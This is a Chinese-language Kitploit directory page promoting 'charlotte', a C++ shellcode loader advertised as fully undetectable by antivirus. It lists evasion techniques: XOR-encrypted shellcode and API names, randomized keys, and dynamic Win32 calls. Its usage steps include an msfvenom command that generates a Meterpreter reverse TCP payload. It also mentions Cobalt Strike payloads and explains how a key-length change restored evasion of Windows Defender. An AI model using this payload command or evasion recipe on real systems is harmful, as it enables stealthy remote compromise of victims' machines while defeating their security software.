Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
charlotte — c++ 完全隐蔽的 shellcode 加载器 ;) | Kitploit
工具/GitHubGitHub/9emin1/charlotte
漏洞利用IDS/IPS规避Shellcode恶意软件分析渗透测试红队Shellcode 生成Payload 开发反机器人
GitHub9emin1/charlotte

charlotte

c++ 完全隐蔽的 shellcode 加载器 ;)

查看仓库
9762075年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

charlotte

c++ 完全免杀的 shellcode 加载器 ;)

发布此工具以庆祝我的新生儿诞生

描述

13/05/2021:

  1. c++ shellcode 加载器,截至 2021 年 5 月 13 日完全免杀 (0/26)。
  2. 动态调用 win32 API 函数
  3. shellcode 和函数名的 XOR 加密
  4. 每次运行随机化 XOR 密钥和变量
  5. 在 Kali Linux 上,只需 'apt-get install mingw-w64*' 即可!

17/05/2021:

  1. 随机字符串长度和 XOR 密钥长度

antiscan.me

alt_text

使用方法

git clone 仓库,生成名为 beacon.bin 的 shellcode 文件,然后运行 charlotte.py

示例:

  1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
  2. cd charlotte
  3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
  4. python charlotte.py
  5. 收工

经 msfvenom -p 测试(见下方 .gif POC 演示),同时也支持 cobalt strike 原始格式 payload

alt_text

更新 v1.1

17/05/21:

显然 Microsoft Windows Defender 能够检测到 .DLL 二进制文件,

它们是如何标记的?通过查找几个 16 字节大小的 XOR 密钥

将其更改为 9(如下方 .gif POC 所示),现在再次免杀

干杯!

alt_text

下载工具